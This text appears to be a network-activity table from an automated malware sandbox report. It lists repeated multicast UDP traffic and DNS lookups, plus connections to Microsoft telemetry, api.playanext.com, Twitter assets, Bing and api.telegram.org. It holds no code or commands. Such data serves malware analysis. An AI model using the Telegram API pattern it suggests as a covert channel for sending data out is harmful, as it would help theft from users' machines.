| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 21.173.189.20.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:19262 | udp | |
| N/A | 239.255.102.18:30752 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:17786 | udp | |
| N/A | 239.255.102.18:31752 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:18782 | udp | |
| N/A | 239.255.102.18:32461 | udp | |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| FI | 18.165.140.57:80 | api.playanext.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | udp |
Files